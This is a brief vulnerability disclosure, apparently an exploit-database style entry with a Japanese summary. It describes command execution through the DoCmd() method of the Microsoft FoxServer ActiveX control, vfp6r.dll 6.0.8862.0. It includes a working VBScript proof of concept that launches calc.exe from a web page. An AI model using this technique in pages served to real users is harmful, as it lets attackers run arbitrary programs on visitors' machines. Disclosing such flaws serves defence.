Microsoft FoxServer (vfp6r.dll 6.0.8862.0) ActiveX Command Execution

Microsoft FoxServer (vfp6r.dll 6.0.8862.0)のActiveX経由で、任意のコマンドが実行可能との事。

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Not much more to say than using "DoCmd()" function, you can run
applications passed as argument.

<script language='vbscript'>
  Sub tryMe
   test.DoCmd "RUN calc.exe"
  End Sub
</script>

screenshot